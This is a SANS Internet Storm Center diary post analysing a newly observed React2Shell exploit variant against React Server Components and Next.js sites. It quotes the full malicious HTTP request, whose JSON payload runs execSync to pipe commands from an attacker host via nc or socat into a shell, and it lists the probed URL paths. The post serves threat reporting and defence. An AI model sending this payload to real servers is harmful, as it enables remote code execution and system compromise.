Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th)
\n \t
\n
<\/BR>
\n
\n \t
\n
<\/BR><\/p>\n
I have already talked about various React2Shell exploit attempts we have observed in the last weeks. But new varieties of the exploit are popping up, and the most recent one is using this particular version of the exploit:<\/p>\n
\n
POST \/app HTTP\/1.1
\nHost: 81.187.66.58
\nContent-Type: multipart\/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
\nNext-Action: 0
\nRsc-Action: 0
\nContent-Length: 388
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36
\nAccept: *\/*
\nConnection: close<\/code><\/p>\n
------WebKitFormBoundary7MA4YWxkTrZu0gW
\nContent-Disposition: form-data; name=\"$RSC\"
\nContent-Type: application\/json<\/code><\/p>\n
{\"0\":{\"0\":{\"0\":{\"constructor\":{\"constructor\":{\"constructor\":\"function() { const {execSync} = require('child_process'); return execSync('n(nc 45.153.34.201 65050||socat - tcp:45.153.34.201:65050)|shn').toString(); }\"}}}}}}
\n------WebKitFormBoundary7MA4YWxkTrZu0gW--<\/code><\/p>\n<\/blockquote>\nThe overall idea is similar to what we have seen in the past. This version adds the “Rsc-Action” header, which I assume is supposed to target sites that expose react server components without Next.js. The “Next-Action” header is still present as well. The scans are also attempting different URLs:<\/p>\n
\n\/
\n\/api
\n\/app
\n\/api\/route
\n\/_next\/server<\/tt><\/p>\n<\/blockquote>\n\nOther exploits have focused on the index page (\/). I assume the pool of vulnerable systems is running dry, and attackers are diversifying their exploits a bit. Sadly, the host providing instructions for what to do next (45.153.34.201) is no longer providing these instructions.<\/p>\n
—
\nJohannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu<\/a>
\nTwitter<\/a>|<\/p>\n\u00a0<\/p>\n
—
\nJohannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu<\/a>
\nTwitter<\/a>|<\/p>\n(c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n
\t
\n
<\/BR><\/p>\n